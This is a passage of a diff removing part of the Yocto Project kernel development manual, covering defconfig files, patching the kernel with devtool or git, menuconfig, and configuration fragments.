-     SRC_URI += "file://defconfig"
-                </literallayout>
-                If you do not want to maintain copies of
-                <filename>defconfig</filename> files in your layer but would
-                rather allow users to use the default configuration from the
-                kernel tree and still be able to add configuration fragments
-                to the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                through, for example, append files, you can direct the
-                OpenEmbedded build system to use a
-                <filename>defconfig</filename> file that is "in-tree".
-            </para>
-
-            <para>
-                To specify an "in-tree" <filename>defconfig</filename> file,
-                use the following statement form:
-                <literallayout class='monospaced'>
-     KBUILD_DEFCONFIG_<replaceable>KMACHINE</replaceable> ?= <replaceable>defconfig_file</replaceable>
-                </literallayout>
-                Here is an example that assigns the
-                <filename>KBUILD_DEFCONFIG</filename> variable based on
-                "raspberrypi2" and provides the path to the "in-tree"
-                <filename>defconfig</filename> file
-                to be used for a Raspberry Pi 2,
-                which is based on the Broadcom 2708/2709 chipset:
-                <literallayout class='monospaced'>
-     KBUILD_DEFCONFIG_raspberrypi2 ?= "bcm2709_defconfig"
-                </literallayout>
-            </para>
-
-            <para>
-                Aside from modifying your kernel recipe and providing your own
-                <filename>defconfig</filename> file, you need to be sure no
-                files or statements set <filename>SRC_URI</filename> to use a
-                <filename>defconfig</filename> other than your "in-tree"
-                file (e.g. a kernel's
-                <filename>linux-</filename><replaceable>machine</replaceable><filename>.inc</filename>
-                file).
-                In other words, if the build system detects a statement
-                that identifies an "out-of-tree"
-                <filename>defconfig</filename> file, that statement
-                will override your
-                <filename>KBUILD_DEFCONFIG</filename> variable.
-            </para>
-
-            <para>
-                See the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KBUILD_DEFCONFIG'><filename>KBUILD_DEFCONFIG</filename></ulink>
-                variable description for more information.
-            </para>
-        </section>
-    </section>
-
-    <section id="using-devtool-to-patch-the-kernel">
-        <title>Using <filename>devtool</filename> to Patch the Kernel</title>
-
-        <para>
-            The steps in this procedure show you how you can patch the
-            kernel using the extensible SDK and <filename>devtool</filename>.
-            <note>
-                Before attempting this procedure, be sure you have performed
-                the steps to get ready for updating the kernel as described
-                in the
-                "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
-                section.
-            </note>
-        </para>
-
-        <para>
-            Patching the kernel involves changing or adding configurations
-            to an existing kernel, changing or adding recipes to the kernel
-            that are needed to support specific hardware features, or even
-            altering the source code itself.
-        </para>
-
-        <para>
-            This example creates a simple patch by adding some QEMU emulator
-            console output at boot time through <filename>printk</filename>
-            statements in the kernel's <filename>calibrate.c</filename> source
-            code file.
-            Applying the patch and booting the modified image causes the added
-            messages to appear on the emulator's console.
-            The example is a continuation of the setup procedure found in
-            the
-            "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
-            Section.
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Check Out the Kernel Source Files:</emphasis>
-                    First you must use <filename>devtool</filename> to checkout
-                    the kernel source code in its workspace.
-                    Be sure you are in the terminal set up to do work
-                    with the extensible SDK.
-                    <note>
-                        See this
-                        <link linkend='setting-up-the-esdk-terminal'>step</link>
-                        in the
-                        "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
-                        section for more information.
-                    </note>
-                    Use the following <filename>devtool</filename> command
-                    to check out the code:
-                    <literallayout class='monospaced'>
-     $ devtool modify linux-yocto
-                    </literallayout>
-                    <note>
-                        During the checkout operation, a bug exists that could
-                        cause errors such as the following to appear:
-                        <literallayout class='monospaced'>
-     ERROR: Taskhash mismatch 2c793438c2d9f8c3681fd5f7bc819efa versus
-            be3a89ce7c47178880ba7bf6293d7404 for
-            /path/to/esdk/layers/poky/meta/recipes-kernel/linux/linux-yocto_4.10.bb.do_unpack
-                        </literallayout>
-                        You can safely ignore these messages.
-                        The source code is correctly checked out.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Edit the Source Files</emphasis>
-                    Follow these steps to make some simple changes to the source
-                    files:
-                    <orderedlist>
-                        <listitem><para>
-                            <emphasis>Change the working directory</emphasis>:
-                            In the previous step, the output noted where you can find
-                            the source files (e.g.
-                            <filename>~/poky_sdk/workspace/sources/linux-yocto</filename>).
-                            Change to where the kernel source code is before making
-                            your edits to the <filename>calibrate.c</filename> file:
-                            <literallayout class='monospaced'>
-     $ cd ~/poky_sdk/workspace/sources/linux-yocto
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Edit the source file</emphasis>:
-                            Edit the <filename>init/calibrate.c</filename> file to have
-                            the following changes:
-                            <literallayout class='monospaced'>
-     void calibrate_delay(void)
-     {
-         unsigned long lpj;
-         static bool printed;
-         int this_cpu = smp_processor_id();
-
-         printk("*************************************\n");
-         printk("*                                   *\n");
-         printk("*        HELLO YOCTO KERNEL         *\n");
-         printk("*                                   *\n");
-         printk("*************************************\n");
-
-     	if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
-               .
-               .
-               .
-                            </literallayout>
-                            </para></listitem>
-                    </orderedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Build the Updated Kernel Source:</emphasis>
-                    To build the updated kernel source, use
-                    <filename>devtool</filename>:
-                    <literallayout class='monospaced'>
-     $ devtool build linux-yocto
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Create the Image With the New Kernel:</emphasis>
-                    Use the <filename>devtool build-image</filename> command
-                    to create a new image that has the new kernel.
-                    <note>
-                        If the image you originally created resulted in a Wic
-                        file, you can use an alternate method to create the new
-                        image with the updated kernel.
-                        For an example, see the steps in the
-                        <ulink url='https://wiki.yoctoproject.org/wiki/TipsAndTricks/KernelDevelopmentWithEsdk'>TipsAndTricks/KernelDevelopmentWithEsdk</ulink>
-                        Wiki Page.
-                    </note>
-                    <literallayout class='monospaced'>
-     $ cd ~
-     $ devtool build-image core-image-minimal
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Test the New Image:</emphasis>
-                    For this example, you can run the new image using QEMU
-                    to verify your changes:
-                    <orderedlist>
-                        <listitem><para>
-                            <emphasis>Boot the image</emphasis>:
-                            Boot the modified image in the QEMU emulator
-                            using this command:
-                            <literallayout class='monospaced'>
-     $ runqemu qemux86
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Verify the changes</emphasis>:
-                            Log into the machine using <filename>root</filename>
-                            with no password and then use the following shell
-                            command to scroll through the console's boot output.
-                            <literallayout class='monospaced'>
-     # dmesg | less
-                            </literallayout>
-                            You should see the results of your
-                            <filename>printk</filename> statements
-                            as part of the output when you scroll down the
-                            console window.
-                            </para></listitem>
-                    </orderedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Stage and commit your changes</emphasis>:
-                    Within your eSDK terminal, change your working directory to
-                    where you modified the <filename>calibrate.c</filename>
-                    file and use these Git commands to stage and commit your
-                    changes:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky_sdk/workspace/sources/linux-yocto
-     $ git status
-     $ git add init/calibrate.c
-     $ git commit -m "calibrate: Add printk example"
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Export the Patches and Create an Append File:</emphasis>
-                    To export your commits as patches and create a
-                    <filename>.bbappend</filename> file, use the following
-                    command in the terminal used to work with the extensible
-                    SDK.
-                    This example uses the previously established layer named
-                    <filename>meta-mylayer</filename>.
-                    <note>
-                        See Step 3 of the
-                        "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using devtool</link>"
-                        section for information on setting up this layer.
-                    </note>
-                    <literallayout class='monospaced'>
-     $ devtool finish linux-yocto ~/meta-mylayer
-                    </literallayout>
-                    Once the command finishes, the patches and the
-                    <filename>.bbappend</filename> file are located in the
-                    <filename>~/meta-mylayer/recipes-kernel/linux</filename>
-                    directory.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Build the Image With Your Modified Kernel:</emphasis>
-                    You can now build an image that includes your kernel
-                    patches.
-                    Execute the following command from your
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                    in the terminal set up to run BitBake:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake core-image-minimal
-                    </literallayout>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id="using-traditional-kernel-development-to-patch-the-kernel">
-        <title>Using Traditional Kernel Development to Patch the Kernel</title>
-
-        <para>
-            The steps in this procedure show you how you can patch the
-            kernel using traditional kernel development (i.e. not using
-            <filename>devtool</filename> and the extensible SDK as
-            described in the
-            "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-            section).
-            <note>
-                Before attempting this procedure, be sure you have performed
-                the steps to get ready for updating the kernel as described
-                in the
-                "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
-                section.
-            </note>
-        </para>
-
-        <para>
-            Patching the kernel involves changing or adding configurations
-            to an existing kernel, changing or adding recipes to the kernel
-            that are needed to support specific hardware features, or even
-            altering the source code itself.
-        </para>
-
-        <para>
-            The example in this section creates a simple patch by adding some
-            QEMU emulator console output at boot time through
-            <filename>printk</filename> statements in the kernel's
-            <filename>calibrate.c</filename> source code file.
-            Applying the patch and booting the modified image causes the added
-            messages to appear on the emulator's console.
-            The example is a continuation of the setup procedure found in
-            the
-            "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
-            Section.
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Edit the Source Files</emphasis>
-                    Prior to this step, you should have used Git to create a
-                    local copy of the repository for your kernel.
-                    Assuming you created the repository as directed in the
-                    "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
-                    section, use the following commands to edit the
-                    <filename>calibrate.c</filename> file:
-                    <orderedlist>
-                        <listitem><para>
-                            <emphasis>Change the working directory</emphasis>:
-                            You need to locate the source files in the
-                            local copy of the kernel Git repository:
-                            Change to where the kernel source code is before making
-                            your edits to the <filename>calibrate.c</filename> file:
-                            <literallayout class='monospaced'>
-     $ cd ~/linux-yocto-4.12/init
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Edit the source file</emphasis>:
-                            Edit the <filename>calibrate.c</filename> file to have
-                            the following changes:
-                            <literallayout class='monospaced'>
-     void calibrate_delay(void)
-     {
-         unsigned long lpj;
-         static bool printed;
-         int this_cpu = smp_processor_id();
-
-         printk("*************************************\n");
-         printk("*                                   *\n");
-         printk("*        HELLO YOCTO KERNEL         *\n");
-         printk("*                                   *\n");
-         printk("*************************************\n");
-
-     	if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
-               .
-               .
-               .
-                            </literallayout>
-                            </para></listitem>
-                    </orderedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Stage and Commit Your Changes:</emphasis>
-                    Use standard Git commands to stage and commit the changes
-                    you just made:
-                    <literallayout class='monospaced'>
-     $ git add calibrate.c
-     $ git commit -m "calibrate.c - Added some printk statements"
-                    </literallayout>
-                    If you do not stage and commit your changes, the OpenEmbedded
-                    Build System will not pick up the changes.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Update Your <filename>local.conf</filename> File
-                    to Point to Your Source Files:</emphasis>
-                    In addition to your <filename>local.conf</filename> file
-                    specifying to use "kernel-modules" and the "qemux86"
-                    machine, it must also point to the updated kernel source
-                    files.
-                    Add
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
-                    statements similar to the following to your
-                    <filename>local.conf</filename>:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky/build/conf
-                    </literallayout>
-                    Add the following to the <filename>local.conf</filename>:
-                    <literallayout class='monospaced'>
-     SRC_URI_pn-linux-yocto = "git:///<replaceable>path-to</replaceable>/linux-yocto-4.12;protocol=file;name=machine;branch=standard/base; \
-                               git:///<replaceable>path-to</replaceable>/yocto-kernel-cache;protocol=file;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
-     SRCREV_meta_qemux86 = "${AUTOREV}"
-     SRCREV_machine_qemux86 = "${AUTOREV}"
-                    </literallayout>
-                    <note>
-                        Be sure to replace
-                        <replaceable>path-to</replaceable> with the pathname
-                        to your local Git repositories.
-                        Also, you must be sure to specify the correct branch
-                        and machine types.
-                        For this example, the branch is
-                        <filename>standard/base</filename> and the machine is
-                        "qemux86".
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Build the Image:</emphasis>
-                    With the source modified, your changes staged and
-                    committed, and the <filename>local.conf</filename> file
-                    pointing to the kernel files, you can now use BitBake to
-                    build the image:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake core-image-minimal
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Boot the image</emphasis>:
-                    Boot the modified image in the QEMU emulator
-                    using this command.
-                    When prompted to login to the QEMU console, use "root"
-                    with no password:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ runqemu qemux86
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Look for Your Changes:</emphasis>
-                    As QEMU booted, you might have seen your changes rapidly
-                    scroll by.
-                    If not, use these commands to see your changes:
-                    <literallayout class='monospaced'>
-     # dmesg | less
-                    </literallayout>
-                    You should see the results of your
-                    <filename>printk</filename> statements
-                    as part of the output when you scroll down the
-                    console window.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Generate the Patch File:</emphasis>
-                    Once you are sure that your patch works correctly, you
-                    can generate a <filename>*.patch</filename> file in the
-                    kernel source repository:
-                    <literallayout class='monospaced'>
-     $ cd ~/linux-yocto-4.12/init
-     $ git format-patch -1
-     0001-calibrate.c-Added-some-printk-statements.patch
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Move the Patch File to Your Layer:</emphasis>
-                    In order for subsequent builds to pick up patches, you
-                    need to move the patch file you created in the previous
-                    step to your layer <filename>meta-mylayer</filename>.
-                    For this example, the layer created earlier is located
-                    in your home directory as <filename>meta-mylayer</filename>.
-                    When the layer was created using the
-                    <filename>yocto-create</filename> script, no additional
-                    hierarchy was created to support patches.
-                    Before moving the patch file, you need to add additional
-                    structure to your layer using the following commands:
-                    <literallayout class='monospaced'>
-     $ cd ~/meta-mylayer
-     $ mkdir recipes-kernel
-     $ mkdir recipes-kernel/linux
-     $ mkdir recipes-kernel/linux/linux-yocto
-                    </literallayout>
-                    Once you have created this hierarchy in your layer, you can
-                    move the patch file using the following command:
-                    <literallayout class='monospaced'>
-     $ mv ~/linux-yocto-4.12/init/0001-calibrate.c-Added-some-printk-statements.patch ~/meta-mylayer/recipes-kernel/linux/linux-yocto
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Create the Append File:</emphasis>
-                    Finally, you need to create the
-                    <filename>linux-yocto_4.12.bbappend</filename> file and
-                    insert statements that allow the OpenEmbedded build
-                    system to find the patch.
-                    The append file needs to be in your layer's
-                    <filename>recipes-kernel/linux</filename>
-                    directory and it must be named
-                    <filename>linux-yocto_4.12.bbappend</filename> and have
-                    the following contents:
-                    <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-
-     SRC_URI_append = " file://0001-calibrate.c-Added-some-printk-statements.patch"
-                    </literallayout>
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    statements enable the OpenEmbedded build system to find
-                    the patch file.</para>
-
-                    <para>For more information on append files and patches,
-                    see the
-                    "<link linkend='creating-the-append-file'>Creating the Append File</link>"
-                    and
-                    "<link linkend='applying-patches'>Applying Patches</link>"
-                    sections.
-                    You can also see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer"</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    <note>
-                        To build <filename>core-image-minimal</filename>
-                        again and see the effects of your patch, you can
-                        essentially eliminate the temporary source files
-                        saved in <filename>poky/build/tmp/work/...</filename>
-                        and residual effects of the build by entering the
-                        following sequence of commands:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake -c cleanall yocto-linux
-     $ bitbake core-image-minimal -c cleanall
-     $ bitbake core-image-minimal
-     $ runqemu qemux86
-                        </literallayout>
-                    </note>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='configuring-the-kernel'>
-        <title>Configuring the Kernel</title>
-
-        <para>
-            Configuring the Yocto Project kernel consists of making sure the
-            <filename>.config</filename> file has all the right information
-            in it for the image you are building.
-            You can use the <filename>menuconfig</filename> tool and
-            configuration fragments to make sure your
-            <filename>.config</filename> file is just how you need it.
-            You can also save known configurations in a
-            <filename>defconfig</filename> file that the build system can use
-            for kernel configuration.
-        </para>
-
-        <para>
-            This section describes how to use <filename>menuconfig</filename>,
-            create and use configuration fragments, and how to interactively
-            modify your <filename>.config</filename> file to create the
-            leanest kernel configuration file possible.
-        </para>
-
-        <para>
-            For more information on kernel configuration, see the
-            "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
-            section.
-        </para>
-
-        <section id='using-menuconfig'>
-            <title>Using&nbsp;&nbsp;<filename>menuconfig</filename></title>
-
-            <para>
-                The easiest way to define kernel configurations is to set
-                them through the <filename>menuconfig</filename> tool.
-                This tool provides an interactive method with which
-                to set kernel configurations.
-                For general information on <filename>menuconfig</filename>, see
-                <ulink url='http://en.wikipedia.org/wiki/Menuconfig'></ulink>.
-            </para>
-
-            <para>
-                To use the <filename>menuconfig</filename> tool in the Yocto
-                Project development environment, you must do the following:
-                <itemizedlist>
-                    <listitem><para>
-                        Because you launch <filename>menuconfig</filename>
-                        using BitBake, you must be sure to set up your
-                        environment by running the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
-                        script found in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        You must be sure of the state of your build's
-                        configuration in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        Your build host must have the following two packages
-                        installed:
-                        <literallayout class='monospaced'>
-     libncurses5-dev
-     libtinfo-dev
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                The following commands initialize the BitBake environment,
-                run the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></ulink>
-                task, and launch <filename>menuconfig</filename>.
-                These commands assume the Source Directory's top-level folder
-                is <filename>~/poky</filename>:
-                <literallayout class='monospaced'>
-     $ cd poky
-     $ source oe-init-build-env
-     $ bitbake linux-yocto -c kernel_configme -f
-     $ bitbake linux-yocto -c menuconfig
-                </literallayout>
-                Once <filename>menuconfig</filename> comes up, its standard
-                interface allows you to interactively examine and configure
-                all the kernel configuration parameters.
-                After making your changes, simply exit the tool and save your
-                changes to create an updated version of the
-                <filename>.config</filename> configuration file.
-                <note>
-                    You can use the entire <filename>.config</filename> file
-                    as the <filename>defconfig</filename> file.
-                    For information on <filename>defconfig</filename> files,
-                    see the
-                    "<link linkend='changing-the-configuration'>Changing the Configuration</link>",
-                    "<link linkend='using-an-in-tree-defconfig-file'>Using an In-Tree <filename>defconfig</filename> File</link>,
-                    and
-                    "<link linkend='creating-a-defconfig-file'>Creating a <filename>defconfig</filename> File</link>"
-                    sections.
-                </note>
-            </para>
-
-            <para>
-                Consider an example that configures the "CONFIG_SMP" setting
-                for the <filename>linux-yocto-4.12</filename> kernel.
-                <note>
-                    The OpenEmbedded build system recognizes this kernel as
-                    <filename>linux-yocto</filename> through Metadata (e.g.
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></ulink><filename>_linux-yocto ?= "12.4%"</filename>).
-                </note>
-                Once <filename>menuconfig</filename> launches, use the
-                interface to navigate through the selections to find the
-                configuration settings in which you are interested.
-                For this example, you deselect "CONFIG_SMP" by clearing the
-                "Symmetric Multi-Processing Support" option.
-                Using the interface, you can find the option under
-                "Processor Type and Features".
-                To deselect "CONFIG_SMP", use the arrow keys to
-                highlight "Symmetric Multi-Processing Support" and enter "N"
-                to clear the asterisk.
-                When you are finished, exit out and save the change.
-            </para>
-
-            <para>
-                Saving the selections updates the <filename>.config</filename>
-                configuration file.
-                This is the file that the OpenEmbedded build system uses to
-                configure the kernel during the build.
-                You can find and examine this file in the Build Directory in
-                <filename>tmp/work/</filename>.
-                The actual <filename>.config</filename> is located in the
-                area where the specific kernel is built.
-                For example, if you were building a Linux Yocto kernel based
-                on the <filename>linux-yocto-4.12</filename> kernel and you
-                were building a QEMU image targeted for
-                <filename>x86</filename> architecture, the
-                <filename>.config</filename> file would be:
-                <literallayout class='monospaced'>
-     poky/build/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+gitAUTOINC+eda4d18...
-     ...967-r0/linux-qemux86-standard-build/.config
-                </literallayout>
-                <note>
-                    The previous example directory is artificially split and
-                    many of the characters in the actual filename are omitted
-                    in order to make it more readable.
-                    Also, depending on the kernel you are using, the exact
-                    pathname might differ.
-                </note>
-            </para>
-
-            <para>
-                Within the <filename>.config</filename> file, you can see the
-                kernel settings.
-                For example, the following entry shows that symmetric
-                multi-processor support is not set:
-                <literallayout class='monospaced'>
-     # CONFIG_SMP is not set
-                </literallayout>
-            </para>
-
-            <para>
-                A good method to isolate changed configurations is to use a
-                combination of the <filename>menuconfig</filename> tool and
-                simple shell commands.
-                Before changing configurations with
-                <filename>menuconfig</filename>, copy the existing
-                <filename>.config</filename> and rename it to something else,
-                use <filename>menuconfig</filename> to make as many changes as
-                you want and save them, then compare the renamed configuration
-                file against the newly created file.
-                You can use the resulting differences as your base to create
-                configuration fragments to permanently save in your kernel
-                layer.
-                <note>
-                    Be sure to make a copy of the <filename>.config</filename>
-                    file and do not just rename it.
-                    The build system needs an existing
-                    <filename>.config</filename> file from which to work.
-                </note>
-            </para>
-        </section>
-
-        <section id='creating-a-defconfig-file'>
-            <title>Creating a&nbsp;&nbsp;<filename>defconfig</filename> File</title>
-
-            <para>
-                A <filename>defconfig</filename> file in the context of
-                the Yocto Project is often a <filename>.config</filename>
-                file that is copied from a build or a
-                <filename>defconfig</filename> taken from the kernel tree
-                and moved into recipe space.
-                You can use a <filename>defconfig</filename> file
-                to retain a known set of kernel configurations from which the
-                OpenEmbedded build system can draw to create the final
-                <filename>.config</filename> file.
-                <note>
-                    Out-of-the-box, the Yocto Project never ships a
-                    <filename>defconfig</filename> or
-                    <filename>.config</filename> file.
-                    The OpenEmbedded build system creates the final
-                    <filename>.config</filename> file used to configure the
-                    kernel.
-                </note>
-            </para>
-
-            <para>
-                To create a <filename>defconfig</filename>, start with a
-                complete, working Linux kernel <filename>.config</filename>
-                file.
-                Copy that file to the appropriate
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
-                directory in your layer's
-                <filename>recipes-kernel/linux</filename> directory, and rename
-                the copied file to "defconfig" (e.g.
-                <filename>~/meta-mylayer/recipes-kernel/linux/linux-yocto/defconfig</filename>).
-                Then, add the following lines to the linux-yocto
-                <filename>.bbappend</filename> file in your layer:
-                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-     SRC_URI += "file://defconfig"
-                </literallayout>
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                tells the build system how to search for the file, while the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                extends the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                variable (search directories) to include the
-                <filename>${PN}</filename> directory you created to hold the
-                configuration changes.
-                <note>
-                    The build system applies the configurations from the
-                    <filename>defconfig</filename> file before applying any
-                    subsequent configuration fragments.
-                    The final kernel configuration is a combination of the
-                    configurations in the <filename>defconfig</filename>
-                    file and any configuration fragments you provide.
-                    You need to realize that if you have any configuration
-                    fragments, the build system applies these on top of and
-                    after applying the existing defconfig file configurations.
-                </note>
-                For more information on configuring the kernel, see the
-                "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='creating-config-fragments'>
-            <title>Creating Configuration Fragments</title>
-
-            <para>
-                Configuration fragments are simply kernel options that
-                appear in a file placed where the OpenEmbedded build system
-                can find and apply them.
-                The build system applies configuration fragments after
-                applying configurations from a <filename>defconfig</filename>
-                file.
-                Thus, the final kernel configuration is a combination of the
-                configurations in the <filename>defconfig</filename>
-                file and then any configuration fragments you provide.
-                The build system applies fragments on top of and
-                after applying the existing defconfig file configurations.
-            </para>
-
-            <para>
-                Syntactically, the configuration statement is identical to
-                what would appear in the <filename>.config</filename> file,
-                which is in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                <note>
-                    For more information about where the
-                    <filename>.config</filename> file is located, see the
-                    example in the
-                    "<link linkend='using-menuconfig'>Using <filename>menuconfig</filename></link>"
-                    section.
-                </note>
-            </para>
-
-            <para>
-                It is simple to create a configuration fragment.
-                One method is to use shell commands.
-                For example, issuing the following from the shell creates a
-                configuration fragment file named
-                <filename>my_smp.cfg</filename> that enables multi-processor
-                support within the kernel:
-                <literallayout class='monospaced'>
-     $ echo "CONFIG_SMP=y" >> my_smp.cfg
-                </literallayout>
-                <note>
-                    All configuration fragment files must use the
-                    <filename>.cfg</filename> extension in order for the
-                    OpenEmbedded build system to recognize them as a
-                    configuration fragment.
-                </note>
-            </para>
-
-            <para>
-                Another method is to create a configuration fragment using the
-                differences between two configuration files: one previously
-                created and saved, and one freshly created using the
-                <filename>menuconfig</filename> tool.
-            </para>
-
-            <para>
-                To create a configuration fragment using this method, follow
-                these steps:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Complete a Build Through Kernel Configuration:</emphasis>
-                        Complete a build at least through the kernel
-                        configuration task as follows:
-                        <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c kernel_configme -f
-                        </literallayout>
-                        This step ensures that you create a
-                        <filename>.config</filename> file from a known state.
-                        Because situations exist where your build state might
-                        become unknown, it is best to run this task prior
-                        to starting <filename>menuconfig</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Launch <filename>menuconfig</filename>:</emphasis>
-                        Run the <filename>menuconfig</filename> command:
-                        <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c menuconfig
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create the Configuration Fragment:</emphasis>
-                        Run the <filename>diffconfig</filename>
-                        command to prepare a configuration fragment.
-                        The resulting file <filename>fragment.cfg</filename>
-                        is placed in the
-                        <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename> directory:
-                        <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c diffconfig
-                        </literallayout>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                The <filename>diffconfig</filename> command creates a file
-                that is a list of Linux kernel <filename>CONFIG_</filename>
-                assignments.
-                See the "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
-                section for additional information on how to use the output
-                as a configuration fragment.
-                <note>
-                    You can also use this method to create configuration
-                    fragments for a BSP.
-                    See the "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
-                    section for more information.
-                </note>
-            </para>
-
-            <para>
-                Where do you put your configuration fragment files?
-                You can place these files in an area pointed to by
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                as directed by your <filename>bblayers.conf</filename> file,
-                which is located in your layer.
-                The OpenEmbedded build system picks up the configuration and
-                adds it to the kernel's configuration.
-                For example, suppose you had a set of configuration options
-                in a file called <filename>myconfig.cfg</filename>.
-                If you put that file inside a directory named
-                <filename>linux-yocto</filename> that resides in the same
-                directory as the kernel's append file within your layer
-                and then add the following statements to the kernel's append
-                file, those configuration options will be picked up and applied
-                when the kernel is built:
-                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-     SRC_URI += "file://myconfig.cfg"
-                </literallayout>
-            </para>
-
-            <para>
-                As mentioned earlier, you can group related configurations
-                into multiple files and name them all in the
-                <filename>SRC_URI</filename> statement as well.
-                For example, you could group separate configurations
-                specifically for Ethernet and graphics into their own files
-                and add those by using a <filename>SRC_URI</filename> statement
-                like the following in your append file:
-                <literallayout class='monospaced'>
-     SRC_URI += "file://myconfig.cfg \
-            file://eth.cfg \
-            file://gfx.cfg"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='validating-configuration'>
-            <title>Validating Configuration</title>
-
-            <para>
-                You can use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configcheck'><filename>do_kernel_configcheck</filename></ulink>
-                task to provide configuration validation:
